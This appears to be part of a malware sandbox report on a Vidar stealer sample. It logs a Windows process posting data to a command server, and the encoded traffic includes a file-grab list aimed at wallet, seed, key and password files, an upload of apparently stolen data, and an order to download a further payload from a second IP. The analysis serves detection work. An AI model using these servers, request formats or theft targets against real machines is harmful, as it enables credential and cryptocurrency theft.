                                                                                                                2024-10-08 03:00:06 UTC2288INData Raw: 38 65 34 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                                                Data Ascii: 8e4REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                21192.168.2.44982249.12.106.2144437648C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-08 03:00:07 UTC278OUTPOST / HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=----DBKKKEHDHCBFIEBFBGID
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Content-Length: 461
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-10-08 03:00:07 UTC461OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 39 38 32 31 37 36 62 38 31 32 63 62 39 32 31 35 34 38 32 65 31 64 39 37 63 32 39 39 37 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 65 65 31 34 34 35 66 63 36 33 62 63 32 30 64 30 65 37 39 36 36 38 36 37 62 31 33 65 30 65 31 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 0d 0a 43 6f 6e 74
                                                                                                                Data Ascii: ------DBKKKEHDHCBFIEBFBGIDContent-Disposition: form-data; name="token"c2982176b812cb9215482e1d97c29975------DBKKKEHDHCBFIEBFBGIDContent-Disposition: form-data; name="build_id"2ee1445fc63bc20d0e7966867b13e0e1------DBKKKEHDHCBFIEBFBGIDCont
                                                                                                                2024-10-08 03:00:08 UTC158INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 03:00:08 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                2024-10-08 03:00:08 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 2ok0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                22192.168.2.44983549.12.106.2144437648C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-08 03:00:09 UTC281OUTPOST / HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=----AKKFHDAKECFHIDHJDAAA
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Content-Length: 130585
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-10-08 03:00:09 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 46 48 44 41 4b 45 43 46 48 49 44 48 4a 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 39 38 32 31 37 36 62 38 31 32 63 62 39 32 31 35 34 38 32 65 31 64 39 37 63 32 39 39 37 35 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 46 48 44 41 4b 45 43 46 48 49 44 48 4a 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 65 65 31 34 34 35 66 63 36 33 62 63 32 30 64 30 65 37 39 36 36 38 36 37 62 31 33 65 30 65 31 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 46 48 44 41 4b 45 43 46 48 49 44 48 4a 44 41 41 41 0d 0a 43 6f 6e 74
                                                                                                                Data Ascii: ------AKKFHDAKECFHIDHJDAAAContent-Disposition: form-data; name="token"c2982176b812cb9215482e1d97c29975------AKKFHDAKECFHIDHJDAAAContent-Disposition: form-data; name="build_id"2ee1445fc63bc20d0e7966867b13e0e1------AKKFHDAKECFHIDHJDAAACont
                                                                                                                2024-10-08 03:00:09 UTC16355OUTData Raw: 38 41 62 62 2f 30 55 31 65 7a 56 34 7a 34 52 2f 35 48 76 52 2f 2b 32 33 2f 6f 70 71 39 6d 72 34 7a 4d 50 39 39 71 2b 71 2f 39 4a 69 66 6f 2b 42 2f 35 46 6d 46 2f 77 79 2f 39 4f 56 44 6d 2f 45 50 69 53 58 52 64 57 30 2b 32 57 4f 4a 6f 5a 69 44 4c 76 42 33 4d 43 36 70 68 4d 64 78 75 79 63 31 30 6c 65 61 65 4f 39 58 6a 66 78 58 70 6c 76 44 35 4c 79 36 5a 2f 70 54 4b 2b 53 58 66 4b 6b 52 6a 41 4a 79 51 6f 2f 4d 65 6c 64 4e 62 2b 4f 64 48 6d 43 73 34 75 6f 56 33 69 4a 33 6b 67 59 4c 47 35 2f 68 59 39 6a 6e 6a 6d 76 4c 68 58 6a 37 53 53 6b 7a 33 71 2b 58 56 50 71 31 47 70 54 70 75 37 54 76 39 2b 6e 34 47 4e 38 53 74 45 68 4f 6d 48 58 34 51 49 37 75 32 4b 4c 49 52 30 6c 51 73 46 77 66 63 45 6a 6e 30 2f 44 48 42 34 51 2b 31 65 70 66 45 58 2f 6b 52 4e 53 2f 37 5a
                                                                                                                Data Ascii: 8Abb/0U1ezV4z4R/5HvR/+23/opq9mr4zMP99q+q/9Jifo+B/5FmF/wy/9OVDm/EPiSXRdW0+2WOJoZiDLvB3MC6phMdxuyc10leaeO9XjfxXplvD5Ly6Z/pTK+SXfKkRjAJyQo/MeldNb+OdHmCs4uoV3iJ3kgYLG5/hY9jnjmvLhXj7SSkz3q+XVPq1GpTpu7Tv9+n4GN8StEhOmHX4QI7u2KLIR0lQsFwfcEjn0/DHB4Q+1epfEX/kRNS/7Z
                                                                                                                2024-10-08 03:00:09 UTC16355OUTData Raw: 6b 66 6d 2b 5a 35 70 69 63 7a 78 44 78 47 4a 64 33 2b 43 58 5a 49 4b 42 53 30 56 75 65 63 4a 52 53 30 6d 4b 4c 67 65 68 36 48 34 6d 68 31 4d 4c 42 50 74 69 75 2f 54 73 2f 30 2f 77 72 6a 6c 38 51 36 6e 6a 4b 33 58 2f 6b 4e 66 38 4b 7a 75 2b 52 53 56 34 39 44 49 38 48 52 71 54 6e 79 4b 53 6c 62 52 70 4f 32 39 37 58 37 6e 73 56 38 37 78 64 61 6e 43 48 4f 30 34 33 31 54 61 76 74 76 62 73 61 77 38 53 36 75 4f 6c 33 2f 41 4f 51 30 2f 77 41 4b 6f 33 74 39 63 36 6a 4f 4a 72 71 54 7a 4a 46 58 59 44 74 41 34 35 50 62 36 6d 71 39 46 64 39 4c 42 59 61 6a 4c 6e 70 55 34 78 66 64 4a 49 34 4b 75 4d 78 4e 57 50 4c 55 71 53 6b 75 7a 62 59 55 55 55 56 30 6e 4d 46 4a 53 30 6c 41 42 58 70 6e 77 35 2f 35 41 46 7a 2f 41 4e 66 62 66 2b 67 4a 58 6d 64 49 51 44 31 46 63 65 4f 77
                                                                                                                Data Ascii: kfm+Z5piczxDxGJd3+CXZIKBS0VuecJRS0mKLgeh6H4mh1MLBPtiu/Ts/0/wrjl8Q6njK3X/kNf8Kzu+RSV49DI8HRqTnyKSlbRpO297X7nsV87xdanCHO0431Tavtvbsaw8S6uOl3/AOQ0/wAKo3t9c6jOJrqTzJFXYDtA45Pb6mq9Fd9LBYajLnpU4xfdJI4KuMxNWPLUqSkuzbYUUUV0nMFJS0lABXpnw5/5AFz/ANfbf+gJXmdIQD1FceOw
                                                                                                                2024-10-08 03:00:09 UTC16355OUTData Raw: 4e 50 50 2b 63 55 30 6a 69 6d 57 68 70 2f 54 30 70 68 48 50 57 6e 6e 6a 2f 77 44 56 54 54 69 6f 5a 53 47 6b 5a 46 4e 39 36 64 2f 6e 46 4e 50 34 56 44 4c 51 6c 49 66 31 70 65 76 46 49 61 6c 6c 43 48 70 6d 6d 45 47 6e 6e 70 31 70 70 48 76 53 47 4a 6a 50 47 50 31 70 50 77 70 66 31 70 4f 2f 30 71 57 4d 54 46 4a 33 70 61 4f 63 55 75 67 30 64 35 33 71 4b 35 6c 38 69 33 65 58 6a 35 52 33 71 57 6f 37 69 46 62 69 33 65 46 76 75 75 4d 47 75 56 33 74 6f 66 4d 52 74 64 58 32 4d 33 56 74 58 4e 75 4e 56 73 37 58 54 69 35 73 4a 47 67 61 37 61 56 78 49 30 69 6e 42 49 58 64 74 43 35 42 77 43 70 4f 4f 2b 65 61 32 4c 71 4f 4f 4c 57 72 79 31 74 37 6d 30 64 56 31 4b 4f 78 45 4b 54 4f 7a 51 4e 49 54 35 65 38 6b 59 35 77 65 68 62 48 51 34 50 46 5a 46 39 44 65 33 64 6a 50 62 79
                                                                                                                Data Ascii: NPP+cU0jimWhp/T0phHPWnnj/wDVTTioZSGkZFN96d/nFNP4VDLQlIf1pevFIallCHpmmEGnnp1ppHvSGJjPGP1pPwpf1pO/0qWMTFJ3paOcUug0d53qK5l8i3eXj5R3qWo7iFbi3eFvuuMGuV3tofMRtdX2M3VtXNuNVs7XTi5sJGga7aVxI0inBIXdtC5BwCpOO+ea2LqOOLWry1t7m0dV1KOxEKTOzQNIT5e8kY5wehbHQ4PFZF9De3djPby
                                                                                                                2024-10-08 03:00:09 UTC16355OUTData Raw: 2b 52 66 71 61 66 5a 58 63 38 6b 31 78 42 63 43 50 7a 49 53 76 7a 52 35 77 63 6a 50 65 73 65 50 55 70 6f 4c 56 6f 6f 6b 52 6f 30 4f 30 58 43 6f 51 6f 2b 6f 78 31 35 2f 2f 41 46 39 37 4f 6c 74 2f 70 64 34 66 4f 38 37 4f 77 2b 5a 36 38 47 75 43 4e 52 75 53 31 50 52 64 4f 30 58 6f 62 6d 2b 76 4b 36 39 4d 33 31 35 6e 58 32 6e 43 72 76 37 62 2f 74 33 39 54 34 58 69 39 57 39 6a 2f 77 42 76 66 2b 32 68 52 52 52 58 31 78 38 59 46 46 46 46 41 48 72 6c 74 2f 78 35 77 2f 37 69 2f 77 41 71 70 36 66 34 67 2b 33 36 7a 71 4f 67 76 59 79 52 79 32 38 4a 64 48 59 2f 4c 4b 70 77 4d 38 34 78 79 66 63 56 61 74 6a 2f 41 4b 4a 44 2f 75 4c 2f 41 43 72 67 2f 74 56 31 59 2f 45 62 55 35 34 5a 32 6b 7a 48 48 6b 78 35 62 59 6e 79 67 68 73 4b 32 41 4d 64 77 4f 33 49 7a 58 35 68 68 5a
                                                                                                                Data Ascii: +RfqafZXc8k1xBcCPzISvzR5wcjPesePUpoLVookRo0O0XCoQo+ox15//AF97Olt/pd4fO87Ow+Z68GuCNRuS1PRdO0Xobm+vK69M315nX2nCrv7b/t39T4Xi9W9j/wBvf+2hRRRX1x8YFFFFAHrlt/x5w/7i/wAqp6f4g+36zqOgvYyRy28JdHY/LKpwM84xyfcVatj/AKJD/uL/ACrg/tV1Y/EbU54Z2kzHHkx5bYnyghsK2AMdwO3IzX5hhZ
                                                                                                                2024-10-08 03:00:09 UTC16355OUTData Raw: 67 38 31 46 72 58 69 4f 35 30 79 79 38 54 77 32 6b 46 69 56 30 37 55 49 4c 57 33 61 57 79 69 5a 30 52 2f 4e 33 4b 57 5a 43 57 49 32 67 5a 4f 54 78 58 6a 31 4d 7a 6a 43 62 6a 79 37 4f 33 35 66 35 6f 38 2b 68 6b 56 53 74 43 4d 31 4c 64 58 2f 50 7a 38 6a 62 37 30 34 45 67 45 41 6b 41 39 52 36 31 53 31 37 55 35 49 4e 51 31 4e 4c 51 36 5a 63 6d 7a 31 53 4f 4a 45 74 4c 52 55 4e 6f 70 44 6a 5a 4b 47 6a 58 7a 43 78 41 41 78 76 41 32 6e 6b 5a 41 4c 4c 72 56 4a 58 31 57 48 54 4a 62 57 30 6c 4e 6a 42 50 63 58 6a 57 30 45 63 52 6c 6d 53 4e 6e 45 47 55 56 66 6c 58 61 46 4f 4f 53 53 33 6f 4d 52 48 4e 61 63 6f 38 33 4c 70 2f 77 4c 33 4b 6c 6b 46 57 4d 75 58 6e 31 2f 7a 64 72 62 2f 30 6a 51 42 4b 6b 45 45 67 6a 6f 52 55 6c 78 63 7a 33 54 49 39 78 4d 38 72 49 75 78 57 63
                                                                                                                Data Ascii: g81FrXiO50yy8Tw2kFiV07UILW3aWyiZ0R/N3KWZCWI2gZOTxXj1MzjCbjy7O35f5o8+hkVStCM1LdX/Pz8jb704EgEAkA9R61S17U5INQ1NLQ6Zcmz1SOJEtLRUNopDjZKGjXzCxAAxvA2nkZALLrVJX1WHTJbW0lNjBPcXjW0EcRlmSNnEGUVflXaFOOSS3oMRHNaco83Lp/wL3KlkFWMuXn1/zdrb/0jQBKkEEgjoRUlxcz3TI9xM8rIuxWc
                                                                                                                2024-10-08 03:00:09 UTC16355OUTData Raw: 33 70 4d 30 46 49 50 57 6b 7a 6d 6c 70 44 7a 51 41 64 4b 51 34 39 4f 39 4c 53 45 2f 70 51 4d 54 4e 42 46 46 4a 6d 6d 4e 42 6d 6b 41 70 66 30 70 4b 51 77 47 4d 65 31 4a 6d 6c 50 53 6b 7a 51 4d 42 77 50 61 6b 39 36 58 6d 6b 7a 2f 6b 30 77 44 72 39 50 65 6b 4f 63 64 4b 55 39 65 74 49 54 53 47 4a 39 61 4b 58 72 53 64 65 31 4d 59 68 36 30 64 4f 6e 48 30 70 66 70 53 64 2f 38 4b 42 6e 6f 6c 46 46 46 5a 6e 79 49 55 56 6f 36 4e 70 4c 61 78 64 79 57 36 79 69 4d 70 47 5a 4d 6c 63 35 77 51 4d 64 66 65 74 54 2f 68 45 69 47 4b 74 65 45 45 64 51 59 76 38 41 36 39 65 62 69 73 32 77 65 45 6e 37 4f 74 4f 7a 39 47 2f 79 52 36 57 46 79 6a 47 34 75 6e 37 53 6a 43 36 39 55 76 7a 5a 7a 56 46 64 51 50 42 2b 66 2b 58 2f 41 50 38 41 49 50 38 41 39 6c 55 47 70 65 47 50 37 50 30 36
                                                                                                                Data Ascii: 3pM0FIPWkzmlpDzQAdKQ49O9LSE/pQMTNBFFJmmNBmkApf0pKQwGMe1JmlPSkzQMBwPak96Xmkz/k0wDr9PekOcdKU9etITSGJ9aKXrSde1MYh60dOnH0pfpSd/8KBnolFFFZnyIUVo6NpLaxdyW6yiMpGZMlc5wQMdfetT/hEiGKteEEdQYv8A69ebis2weEn7OtOz9G/yR6WFyjG4un7SjC69UvzZzVFdQPB+f+X/AP8AIP8A9lUGpeGP7P06
                                                                                                                2024-10-08 03:00:09 UTC16100OUTData Raw: 73 38 46 68 65 79 77 75 4d 72 4a 48 62 4f 79 6b 65 6f 49 47 4b 69 69 6a 6c 6e 74 4a 4c 71 47 33 6e 6c 74 6f 38 37 35 6f 34 57 5a 46 77 4d 6e 4c 41 59 48 46 65 52 2f 5a 64 44 2f 6e 35 2b 52 39 46 2f 62 32 4b 30 2f 63 37 2b 70 36 70 2f 77 6d 76 68 2f 2f 41 4a 2f 32 2f 77 44 41 65 54 2f 34 6d 6a 2f 68 4e 66 44 2f 41 50 7a 2f 41 44 66 2b 41 38 6e 2f 41 4d 54 58 6c 4d 4f 36 35 6e 53 43 43 4b 57 57 5a 31 44 70 47 6b 62 46 6d 55 6a 49 49 41 47 53 4d 63 35 39 4b 55 71 34 75 66 73 78 69 6b 46 78 75 43 65 53 55 49 66 63 65 67 32 34 7a 6e 32 70 2f 77 42 6c 55 66 35 2f 79 4a 66 45 47 4a 53 76 37 4c 38 78 71 6a 43 4b 44 32 46 4c 54 70 49 70 6f 72 70 62 57 57 43 65 4f 35 62 47 32 46 34 6d 56 32 7a 30 77 70 47 54 6d 6c 38 6d 63 33 76 32 4c 37 4e 63 66 61 38 5a 2b 7a 2b
                                                                                                                Data Ascii: s8FheywuMrJHbOykeoIGKiijlntJLqG3nlto875o4WZFwMnLAYHFeR/ZdD/n5+R9F/b2K0/c7+p6p/wmvh//AJ/2/wDAeT/4mj/hNfD/APz/ADf+A8n/AMTXlMO65nSCCKWWZ1DpGkbFmUjIIAGSMc59KUq4ufsxikFxuCeSUIfceg24zn2p/wBlUf5/yJfEGJSv7L8xqjCKD2FLTpIporpbWWCeO5bG2F4mV2z0wpGTml8mc3v2L7Ncfa8Z+z+
                                                                                                                2024-10-08 03:00:10 UTC158INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 03:00:10 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                2024-10-08 03:00:10 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 2ok0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                23192.168.2.44984749.12.106.2144437648C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-08 03:00:11 UTC278OUTPOST / HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=----AKKFHDAKECFHIDHJDAAA
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Content-Length: 331
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-10-08 03:00:11 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 46 48 44 41 4b 45 43 46 48 49 44 48 4a 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 39 38 32 31 37 36 62 38 31 32 63 62 39 32 31 35 34 38 32 65 31 64 39 37 63 32 39 39 37 35 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 46 48 44 41 4b 45 43 46 48 49 44 48 4a 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 65 65 31 34 34 35 66 63 36 33 62 63 32 30 64 30 65 37 39 36 36 38 36 37 62 31 33 65 30 65 31 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 46 48 44 41 4b 45 43 46 48 49 44 48 4a 44 41 41 41 0d 0a 43 6f 6e 74
                                                                                                                Data Ascii: ------AKKFHDAKECFHIDHJDAAAContent-Disposition: form-data; name="token"c2982176b812cb9215482e1d97c29975------AKKFHDAKECFHIDHJDAAAContent-Disposition: form-data; name="build_id"2ee1445fc63bc20d0e7966867b13e0e1------AKKFHDAKECFHIDHJDAAACont
                                                                                                                2024-10-08 03:00:12 UTC158INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 03:00:11 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                2024-10-08 03:00:12 UTC79INData Raw: 34 34 0d 0a 4d 54 49 34 4e 54 67 79 4d 58 78 6f 64 48 52 77 4f 69 38 76 4d 54 67 31 4c 6a 49 78 4e 53 34 78 4d 54 4d 75 4d 54 45 33 4c 32 6c 75 59 79 39 6a 62 47 6c 77 4c 6d 56 34 5a 58 77 79 66 47 74 72 61 32 74 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 44MTI4NTgyMXxodHRwOi8vMTg1LjIxNS4xMTMuMTE3L2luYy9jbGlwLmV4ZXwyfGtra2t80


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                24192.168.2.44986849.12.106.2144437648C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-08 03:00:14 UTC278OUTPOST / HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=----BFHJJJDAFBKEBGDGHCGD
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Content-Length: 499
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-10-08 03:00:14 UTC499OUTData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 39 38 32 31 37 36 62 38 31 32 63 62 39 32 31 35 34 38 32 65 31 64 39 37 63 32 39 39 37 35 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 65 65 31 34 34 35 66 63 36 33 62 63 32 30 64 30 65 37 39 36 36 38 36 37 62 31 33 65 30 65 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 44 0d 0a 43 6f 6e 74
                                                                                                                Data Ascii: ------BFHJJJDAFBKEBGDGHCGDContent-Disposition: form-data; name="token"c2982176b812cb9215482e1d97c29975------BFHJJJDAFBKEBGDGHCGDContent-Disposition: form-data; name="build_id"2ee1445fc63bc20d0e7966867b13e0e1------BFHJJJDAFBKEBGDGHCGDCont
                                                                                                                2024-10-08 03:00:15 UTC158INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 03:00:15 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                2024-10-08 03:00:15 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 2ok0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                25192.168.2.44988249.12.106.2144437648C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-08 03:00:16 UTC278OUTPOST / HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=----KJEGCFBGDHJJJJJKJECF
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Content-Length: 331
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-10-08 03:00:16 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 39 38 32 31 37 36 62 38 31 32 63 62 39 32 31 35 34 38 32 65 31 64 39 37 63 32 39 39 37 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 65 65 31 34 34 35 66 63 36 33 62 63 32 30 64 30 65 37 39 36 36 38 36 37 62 31 33 65 30 65 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 46 0d 0a 43 6f 6e 74
                                                                                                                Data Ascii: ------KJEGCFBGDHJJJJJKJECFContent-Disposition: form-data; name="token"c2982176b812cb9215482e1d97c29975------KJEGCFBGDHJJJJJKJECFContent-Disposition: form-data; name="build_id"2ee1445fc63bc20d0e7966867b13e0e1------KJEGCFBGDHJJJJJKJECFCont
                                                                                                                2024-10-08 03:00:16 UTC158INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 03:00:16 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                2024-10-08 03:00:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Statistics

                                                                                                                CPU Usage

                                                                                                                Click to jump to process

                                                                                                                Memory Usage

                                                                                                                Click to jump to process

                                                                                                                High Level Behavior Distribution

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Behavior

                                                                                                                Click to jump to process

                                                                                                                System Behavior

                                                                                                                General

                                                                                                                Target ID:0
                                                                                                                Start time:22:58:57
                                                                                                                Start date:07/10/2024
                                                                                                                Path:C:\Users\user\Desktop\7AeSqNv1rC.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Users\user\Desktop\7AeSqNv1rC.exe"
                                                                                                                Imagebase:0xa60000
                                                                                                                File size:608'256 bytes
                                                                                                                MD5 hash:F275736A38A6B90825076E8D786AD5C5
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1905965220.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.1905965220.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:3
                                                                                                                Start time:22:59:14
                                                                                                                Start date:07/10/2024
                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                                Imagebase:0x620000
                                                                                                                File size:42'064 bytes
                                                                                                                MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                                Has elevated privileges:true
